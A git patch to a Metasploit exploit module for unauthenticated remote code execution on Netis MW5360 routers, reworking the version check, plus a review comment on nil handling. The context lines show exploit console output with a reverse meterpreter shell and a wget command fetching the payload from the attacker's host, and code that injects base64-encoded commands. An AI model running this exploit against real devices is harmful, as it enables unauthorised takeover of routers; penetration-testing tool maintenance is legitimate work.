From 55fa94995b5a1252e0be7b1f2ad7411f652ee12a Mon Sep 17 00:00:00 2001
From: h00die-gr3y
Date: Thu, 6 Jun 2024 22:23:35 +0000
Subject: [PATCH] Updated check method
---
 .../http/netis_unauth_rce_cve_2024_22729.md | 2 +-
 .../http/netis_unauth_rce_cve_2024_22729.rb | 18 +++++++-----------
 2 files changed, 8 insertions(+), 12 deletions(-)
diff --git a/documentation/modules/exploit/linux/http/netis_unauth_rce_cve_2024_22729.md b/documentation/modules/exploit/linux/http/netis_unauth_rce_cve_2024_22729.md
index 0d6cdeb0f1f3..52327a22659a 100644
--- a/documentation/modules/exploit/linux/http/netis_unauth_rce_cve_2024_22729.md
+++ b/documentation/modules/exploit/linux/http/netis_unauth_rce_cve_2024_22729.md
@@ -195,7 +195,7 @@ msf6 exploit(linux/http/netis_unauth_rce_cve_2024_22729) > exploit
 [*] Started reverse TCP handler on 192.168.1.2:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Checking if 192.168.1.1:80 can be exploited.
-[+] The target appears to be vulnerable. Netis MW5360 1.0.1.3442
+[+] The target appears to be vulnerable. Netis(MW5360)-V1.0.1.3442
 [*] Executing Linux Dropper for linux/mipsle/meterpreter_reverse_tcp
 [*] Using URL: http://192.168.1.2:8080/IbZMnLDC
 [*] Executing wget -qO /tmp/kgfXdZZW http://192.168.1.2:8080/IbZMnLDC
diff --git a/modules/exploits/linux/http/netis_unauth_rce_cve_2024_22729.rb b/modules/exploits/linux/http/netis_unauth_rce_cve_2024_22729.rb
index cfc1be3af7a7..0f87b3082aa5 100644
--- a/modules/exploits/linux/http/netis_unauth_rce_cve_2024_22729.rb
+++ b/modules/exploits/linux/http/netis_unauth_rce_cve_2024_22729.rb
@@ -75,7 +75,7 @@ def execute_command(cmd, _opts = {})
 # store name of payload and cleanup payload file when session is established (see def on_new_session)
 @payload_name = cmd.split('+x')[1].strip if cmd.include?('chmod +x')
- # skip last command to remove payload becuase it does not work
+ # skip last command to remove payload because it does not work
 unless cmd.include?('rm -f')
 app_random = Rex::Text.rand_text_alphanumeric(4..8)
 payload = Base64.strict_encode64("`#{cmd}`")
@@ -113,19 +113,15 @@ def check
 # trying to get the model and version number
 # unfortunately JSON parsing fails, so we need to use this ugly REGEX :-(
 version = res.body.match(/.?(version).?\s*:\s*.?((\\|[^,])*)/)
- model = res.body.match(/.?(model).?\s*:\s*.?((\\|[^,])*)/)
- unless version.nil? || model.nil?
+ unless version.nil?
 version_number = version[2].split('-V')[1].chop
- model_number = model[2].chop
+ model_number = version[2].split('-V')[0][/\(([^(]+)/, 1].chop
 # Check if target is model MW5360 and running firmware 1.0.1.3442 (newest release 2024-04-24) or lower
- if version_number && model_number == 'MW5360'
- if Rex::Version.new(version_number) <= Rex::Version.new('1.0.1.3442')
- return CheckCode::Appears("Netis #{model_number} #{version_number}")
- end
-
- return CheckCode::Safe("Netis #{model_number} #{version_number}")
+ if version_number && model_number == 'MW5360' && (Rex::Version.new(version_number) <= Rex::Version.new('1.0.1.3442'))
+ return CheckCode::Appears(version[2].chop.to_s)
 end
- CheckCode::Safe("#{model_number} #{version_number}")
+
+ return CheckCode::Safe(version[2].chop.to_s)
 end
 CheckCode::Safe
 end
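Review bot: In the second hunk (`check`), both new assignments call `.chop` on a value that can be nil: `version[2].split('-V')[1]` is nil when the string has no `-V`, and `[/\(([^(]+)/, 1]` is nil when there is no parenthesised model, so an unexpected version format raises NoMethodError instead of returning a check code, and the later `version_number &&` guard can never see nil. Safe navigation keeps that guard meaningful: `version_number = version[2].split('-V')[1]&.chop` and `model_number = version[2].split('-V')[0][/\(([^(]+)/, 1]&.chop`. Separately, a response whose version string cannot be parsed still ends in `CheckCode::Safe`; `CheckCode::Unknown` would avoid reporting an unidentified device as not vulnerable, though this should be confirmed against the part of `check` that lies outside the hunk.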